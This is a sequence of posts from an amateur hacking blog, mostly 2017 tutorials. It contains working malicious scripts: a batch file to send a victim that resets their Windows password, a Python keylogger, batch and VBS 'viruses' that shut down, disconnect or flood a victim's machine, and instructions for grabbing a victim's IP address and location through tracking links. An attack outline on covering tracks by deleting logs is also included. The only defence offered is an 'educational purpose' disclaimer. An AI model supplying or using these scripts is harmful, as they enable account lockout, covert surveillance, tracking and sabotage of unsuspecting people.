Monday, 1 October 2018

Scan QR Code OR BAR Code with Barcode Scanner App:-

Hi Friends today i am going to tell you about new topic that is about storing meaningful information in QR Code or BAR Code. I have received many messages and emails about how we can share our secret information to our friend. here are some steps to generate and share QR code having secret information .

step 1:
select one of the top displaying menu for which you want to generate QR code.
step 2:
then type the information and you will see a QR code will be generated.
now you can save this QR code and send to your friend. He/She will scan this QR code using the bar code scanner app given bellow.You can scan any bar code and QR code using this app.
download the app and click the scan now button and scan the QR code vertically(portrait) and bar code horizontally(Landscape).

Tuesday, 5 December 2017

How To Make Invisible Name Facebook ID


Hello guys! Today i am going to tell you a trick that how we can make invisible name facebook id. Follow bellow steps.

                              

NOTE: THIS IS ONLY FOR EDUCATIONAL PURPOSE. DON'T HARM ANYONE, I WILL NOT BE RESPONSIBLE OF ANY ILLEGAL ACTIVITY PERFORMED BY YOU.
So let's start.
open any browser and goto www.facebook.com and then click on create account link and copy the bellow code and paste in first and last name.

Code 1⇨   ( ՙՙ )
Code 2⇨  ( ٌٍٍِّّْ )

copy one of the above code and paste the same code in first and last name place use name as _____( ٌٍٍِّّْ ) or ( ՙՙ )_____  and then remove the braces () from the code.
Then fill other required fields and you will gets invisible name facebbok id.
Thanks for reading!
Take Care♥♥♥

Tuesday, 21 November 2017

SIX STEPS OF ETHICAL HACKING

Hello guys! today i am going to tell you main steps that every hacker must know. By using these steps you can gather information about yor target and then you can easily attack on them.
NOTE:THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSE, DON'T HARM ANYONE. I WILL NOT BE RESPONSIBLE OF ANY ILLEGAL ACTIVITY PERFORMED BY YOU.



1. FOOTPRINTING:-
the first technique often used by hackers is called footprinting. the objective is to gather information essential to an attack and enable an attacker to obtain a complete profile of an organization's security posture.
2. SCANNING:-
in this step hackers perform scanning to gain a more detailed view of a company's network and to understand what specific computer systems and services are in use.
3.  ENUMERATION:-
the third phase is the process of identiying user accounts and poorly protected computing resources.During the enumeration stage, the hacker connects to computers in the target network and pokes around these systems to gain more informations.
4.  PENETRATION:-
during the fourth phase, penetration, the attacker attempts to gain control of one or more systems in the target network. For exemple once an attacker has acquired a list of usernames during enumeration, he can usuallyy guess one of the user's passwords and gain more extensive access to that user's account.
5.  ADVANCE:-
in the advance phase of hacking the attacker leverages computers or accounts that have been compromised during penetration to launch additional attacks on the target network. for instance, the attacker can break into more sensitive administator root accounts ,install backdoors or trojan horse programs, and install network sniffers to gather additional information from data flowing over the network.
6.  COVERING TRACKS:-
in the final phase of hacking, the hacker eliminates any records or logs showing his malicious behavior. by deleting log files, disabling system auditing(which would otherwise alert the administrator to malicious activities), and hiding hacking files that the hacker has introduced he can cover his tracks and avoid detection.
THANKS FOR READING!
TAKE CARE♥♥♥

HOW TO CHANGE ANYONE COMPUTER PASSWORD USING A BATCH(.bat) FILE:-



Hi Friends Today We Are Going To Talking About A Topic That How Can We Change Any One Computer Password By Using A Batch(.bat) File?


1- OPEN NOTEPAD IN YOUR COMPUTER AND COPY THE CODE GIVEN BELOW.

@Echo Off
for /f "tokens=1-1 delims=\" %%a in ("%PATH%") do (Set Root=%%a)
%Root%
for /f "tokens=1-3 delims=\" %%a in ("X:%homepath%")
do (Set UserName=%%c)
net user "%UserName%" "password"


2- INPLACE OF "password" "TYPE THE PASSWORD YOU WANT TO CHANGE"

FOR EXAMPLE IF I WANT TO CHANGE MY COMPUTER PASSWORD AS "GOOGLE123"
THEN THE CODE WILL BE LIKE THIS

@Echo Off
for /f "tokens=1-1 delims=\" %%a in ("%PATH%") do (Set Root=%%a)
%Root%
for /f "tokens=1-3 delims=\" %%a in ("X:%homepath%") do
(Set UserName=%%c)
net user "%UserName%" "GOOGLE123"


3- AND SAVE THIS CODE AS anything.bat

4- AFTER THAT SEND IT TO YOUR FRIEND OR THAT COMPUTER PASSWORD YOU WANT TO CHANGE
WHEN YOUR FRIEND WILL OPEN THAT BAT FILE HIS/HER COMPUTER PASSWORD WILL BE CHANGED.
THIS TUTORIAL IS ONLY FOR EDUCATIONAL PURPOSE, DON'T HARM ANYONE. I WILL NOT BE RESPONSIBLE OF ANY ILLEGAL ACTIVITY PERFORMED BY YOU.
STAY SAFE!
TAKE CARE♥♥♥

Monday, 20 November 2017

How To Create a Keylogger using Notepad

A keylogger is a hacking tool of the newbie but sometimes highly skilled hackers also use them.I already posted an article on the topic that what are the software and hardware keyloggers but now i am going to teach you that how you can create your own keylogger using notepad.if you don't know what are keyloggers and how to use them, i prefer you to read my previous article from the link https://herohack-security.blogspot.com/2017/10/how-to-hack-facebook_66.html. These are very easy to create and use. So, let’s learn how to create a free keylogger.




How To Create Keylogger Using Notepad?

1. Open notepad and paste the following code in it:



import pyHook, pythoncom, sys, logging

# feel free to set the file_log to a different file name/location

file_log = 'output.txt'

def OnKeyboardEvent(event):

logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s')

chr(event.Ascii)

logging.log(10,chr(event.Ascii))

return True

hooks_manager = pyHook.HookManager()

hooks_manager.KeyDown = OnKeyboardEvent

hooks_manager.HookKeyboard()

pythoncom.PumpMessages()


2. Save the file as keylogger.pyw

3. Fire up your keylogger
Double-click on the file you just created and test it out, then start typing.

When you want to stop logging, open up task manager and kill all the “python” processes. Then look for output.txt in the same directory were the keylogger.pyw is. Open it up and you should see whatever you typed.
You may see some weird looking character if you open it with notepad, those characters means you hit the backspace key.
This tutorial is only for educational purpose. don't harm anyone i will not be responsible of any illegal activity performed by you.
Stay Safe and Enjoy.
Thanks for reading!♥♥♥

Thursday, 16 November 2017

Find IP Address and location of any device

Find IP Address and location of any device:-
Hello guys!
How are you, I hope you all are fine and doing well. Today I am going to write an article on a very important topic. Many friends requested me to wrote article on HOW TO FIND IP ADDRESS OF ANY DEVICE.



 Now i am going to teach you how you can find IP address of any device. so follow these steps:-

  1.  open any web browser and search http://whatstheirip.com/. you will see following screen:- 
                      

    2.   Now enter your email address and you will get congratulation message and you will see some links on the screen.

 you can copy one of these two links and send to your friend or victim, when your victim will click on the link you will get their IP address and location. Moreover, if you want detailed location you can search
                                          https://www.iplocation.net/.

    3.   Then copy the IP address of of victim and paste here.

This tutorial is only for educational purpose. Don't harm anyone I will not be responsible of any illegal activity done by you. Stay Safe and Learn. 
Thanks for reading. Take Care♥♥♥!

Wednesday, 25 October 2017

How To Create Funny Viruses

How To Create Funny Viruses Using Notepad: -

Hello guys! How are you. I hope you all are fine. Today i will teach you how to create funny and harmless viruses using notepad. The language used for writing such type of viruses is batch file programming.

This is only for educational purpose don't harm someone. I will not be responsible of any illegal activity.
So let's start. open your notepad and write the following code and save anything.bat

1)  This virus will convey a message to your friend and will shutdown his/her computer.

@echo off
msg * I love you
shutdown -c "Error! going to sleep!" -s


send this file to your friend.

2) This virus will Continually pop out your victim's CD Drive.



Set oWMP = CreateObject("WMPlayer.OCX.7"
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop



3)   How to stop Victim's internet access:-

@Echo off
Ipconfig /release


Save this as anything.bat and send it to victim. There IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew in place of  IPconfig/release.


4)   Open Notepad continually in your friend's computer:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.

Take care guys♥♥♥